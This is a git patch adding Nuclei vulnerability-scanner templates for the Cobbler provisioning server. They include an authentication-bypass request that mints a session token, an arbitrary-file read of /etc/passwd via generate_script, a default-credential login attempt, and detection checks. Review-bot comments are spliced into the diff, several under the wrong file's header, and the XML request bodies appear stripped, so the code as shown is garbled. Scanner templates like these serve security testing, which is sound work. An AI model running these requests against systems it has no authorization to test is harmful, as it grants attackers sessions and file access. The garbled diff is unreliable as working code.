From 99c131b1a63852645f7475e0cd1e2addf9de518b Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Mon, 14 Feb 2022 22:50:32 +0530
Subject: [PATCH] Added Cobbler provisioning server Templates (#3698)
Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com>
Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com>
---
 cves/2018/CVE-2018-1000226.yaml | 60 ++++++++++++
 cves/2021/CVE-2021-40323.yaml | 95 +++++++++++++++++++
 .../cobbler/cobbler-default-login.yaml | 66 +++++++++++++
 exposed-panels/cobbler-webgui.yaml | 31 ++++++
 .../cobbler-exposed-directory.yaml | 27 ++++++
 technologies/cobbler-version.yaml | 41 ++++++++
 6 files changed, 320 insertions(+)
 create mode 100644 cves/2018/CVE-2018-1000226.yaml
 create mode 100644 cves/2021/CVE-2021-40323.yaml
 create mode 100644 default-logins/cobbler/cobbler-default-login.yaml
 create mode 100644 exposed-panels/cobbler-webgui.yaml
 create mode 100644 misconfiguration/cobbler-exposed-directory.yaml
 create mode 100644 technologies/cobbler-version.yaml
diff --git a/cves/2018/CVE-2018-1000226.yaml b/cves/2018/CVE-2018-1000226.yaml
new file mode 100644
index 0000000000..c070e810a9
--- /dev/null
+++ b/cves/2018/CVE-2018-1000226.yaml
@@ -0,0 +1,60 @@ +id: CVE-2018-1000226 + +info: + name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass + author: c-sh0 + severity: critical + reference: + - https://github.com/cobbler/cobbler/issues/1916 + - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1000226 + cwe-id: CWE-732 + tags: cve,cve2018,cobbler,auth-bypass + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + _CobblerXMLRPCInterface__make_token + + + + cobbler + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "Content-Type: text/xml" + + - type: word + part: body + words: + - "" + + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + + - type: regex + part: body + regex: + - "(.*[a-zA-Z0-9].+==)" diff --git a/cves/2021/CVE-2021-40323.yaml b/cves/2021/CVE-2021-40323.yaml new file mode 100644 index 0000000000..934f0a17e6 --- /dev/null +++ b/cves/2021/CVE-2021-40323.yaml 
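Review bot: The dsl matcher `!contains(tolower(body), 'faultCode')` lowercases the body and then searches for a mixed-case literal, so it can never find the string and the negation is always true; an XML-RPC fault response passes it untouched, leaving the loose `(.*[a-zA-Z0-9].+==)` regex as the only thing separating a real token from a fault that happens to contain `==`. Use a lowercase needle, `- "!contains(tolower(body), 'faultcode')"`, and consider a base64-shaped token regex such as `([A-Za-z0-9+/]{20,}={1,2})` so stray `==` in error text does not count as a hit. The `info` block also has no `description`; it should say that the request invokes the private `_CobblerXMLRPCInterface__make_token` method over unauthenticated XML-RPC with the user name `cobbler`, so a positive result means the scan itself minted a live session token for that user on the target.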
@@ -0,0 +1,95 @@ +id: CVE-2021-40323 + +info: + name: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method + severity: critical + author: c-sh0 + reference: + - https://github.com/cobbler/cobbler/issues/2795 + - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-40323 + cwe-id: CWE-94 + tags: cve,cve2021,cobbler,rce + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + find_profile + + + + + + name + + * + + + + + + + + + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + generate_script + + + + {{profile}} + + + + + + + + + + /etc/passwd + + + + + + extractors: + - type: regex + name: profile + internal: true + group: 1 + regex: + - '(.*?)' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/xml' + + - type: regex + regex: + - "root:.*:0" + - "bin:.*:1" + - "nobody:.*:99" + condition: or \ No newline at end of file diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml new file mode 100644 index 0000000000..a92b21065f --- /dev/null +++ b/default-logins/cobbler/cobbler-default-login.yaml 
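Review bot: The `info` block has no `description`, and the `name` is the NVD sentence about log poisoning, while the two requests do something narrower that an operator needs spelled out: `find_profile` with `*` is used only to obtain an existing profile name, and `generate_script` is then asked to render `/etc/passwd` for that profile, with the `root:`/`bin:`/`nobody:` regexes proving the file contents came back. Suggested `description: Calls the unauthenticated generate_script XML-RPC method with /etc/passwd as the script path for an existing profile and matches passwd entries in the rendered output. Read-only check; it can only fire when at least one profile exists.` It is also worth confirming against the cited tnpitsecurity write-up that this file read through `generate_script` is the vector NVD assigned to CVE-2021-40323 rather than one of the sibling IDs from the same advisory, so the id reported on a hit is the accurate one.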
@@ -0,0 +1,66 @@ +id: cobbler-default-login + +info: + name: Cobbler Default Login + author: c-sh0 + reference: + - https://github.com/cobbler/cobbler/issues/2307 + - https://github.com/cobbler/cobbler/issues/2909 + severity: high + tags: cobbler,default-login,api + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + + + + login + + + + {{username}} + + + + + {{password}} + + + + + + attack: pitchfork + payloads: + username: + - cobbler + - testing + password: + - cobbler + - testing + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/xml' + + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + - "!contains(tolower(body), 'login failed')" + condition: or + + - type: regex + part: body + regex: + - "(.*[a-zA-Z0-9].+==)" diff --git a/exposed-panels/cobbler-webgui.yaml b/exposed-panels/cobbler-webgui.yaml new file mode 100644 index 0000000000..abd7d4d1bc --- /dev/null +++ b/exposed-panels/cobbler-webgui.yaml @@ -0,0 +1,31 @@ +id: cobbler-webgui + +info: + name: Cobbler WebGUI Detection + author: c-sh0 + description: Detection of Cobbler WebGUI + severity: info + metadata: + shodan-query: http.title:"Cobbler Web Interface" + tags: cobbler,webserver,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cobbler_web" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Cobbler Web Interface" + - "/cobbler_webui_content/" + - "/cobbler_web/do_login" + condition: or diff --git a/misconfiguration/cobbler-exposed-directory.yaml b/misconfiguration/cobbler-exposed-directory.yaml new file mode 100644 index 0000000000..34ce9c6f77 --- /dev/null +++ b/misconfiguration/cobbler-exposed-directory.yaml 
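Review bot: The dsl matcher joins two negated checks with `condition: or`, so it passes whenever either string is absent, and the first check cannot fail at all because `tolower(body)` is compared against the mixed-case literal `'faultCode'`; the net effect is that a `login failed` fault carrying any `==`-like text would be reported as a working default login. Both conditions have to hold, so change the block to `- "!contains(tolower(body), 'faultcode')"`, `- "!contains(tolower(body), 'login failed')"` and `condition: and`. The `pitchfork` attack pairs the lists positionally, so only `cobbler`/`cobbler` and `testing`/`testing` are tried; whether `testing` is a shipped default or a test-fixture account in the two linked issues should be confirmed and stated in a `description`, together with the fact that a successful match creates a live session on the target. The `Accept:` header is irrelevant to an XML-RPC call and can be dropped.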
@@ -0,0 +1,27 @@ +id: cobbler-exposed-directory + +info: + name: Exposed Cobbler Directories + author: c-sh0 + severity: medium + description: Searches for exposed Cobbler Directories + tags: cobbler,exposure,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/cobbler/" + - "{{BaseURL}}/cblr/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Index of /cobbler" + - "Index of /cblr" + condition: or diff --git a/technologies/cobbler-version.yaml b/technologies/cobbler-version.yaml new file mode 100644 index 0000000000..f7204a91d5 --- /dev/null +++ b/technologies/cobbler-version.yaml @@ -0,0 +1,41 @@ +id: cobbler-version + +info: + name: Cobbler Version Detection + author: c-sh0 + severity: info + description: Obtain cobbler version information + tags: tech,cobbler,api + +requests: + - method: POST + path: + - "{{BaseURL}}/cobbler_api" + + body: | + + + extended_version + + + + headers: + Content-Type: text/xml + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'version' + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" \ No newline at end of file
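Review bot: `description: Searches for exposed Cobbler Directories` says nothing about why a listing at `/cobbler/` or `/cblr/` matters or what a hit means, and the matcher only recognises the Apache-style `Index of /...` title, so listings rendered by other front-ends are missed. A more useful description would be along the lines of `description: Detects directory listings at /cobbler/ and /cblr/, the paths Cobbler's web front-end serves install media and autoinstall files from; a listing lets an unauthenticated client enumerate and fetch them, including any credentials embedded in kickstart/autoinstall templates.` — the claim about what those paths serve is from Cobbler's default Apache configuration as I recall it, so confirm it before committing the wording. Since PXE clients are expected to fetch files from these paths, the finding is really about what is reachable in the listing rather than the listing existing, and saying so stops triage from ending at "listing enabled".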
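Review bot: The version extractor `([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})` leaves the separators unescaped, so `.` matches any character and a time such as `13:12:29` will be captured as a version if, as the method name suggests, the `extended_version` struct carries build or git timestamps next to the version string. Escape the dots and use single quotes so YAML keeps the backslashes literal: `- '([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'`. The `'version'` body-word matcher could also be satisfied by an XML-RPC fault that mentions the word; adding `- "!contains(tolower(body), 'faultcode')"` as a dsl matcher would keep a fault from being reported as a version hit.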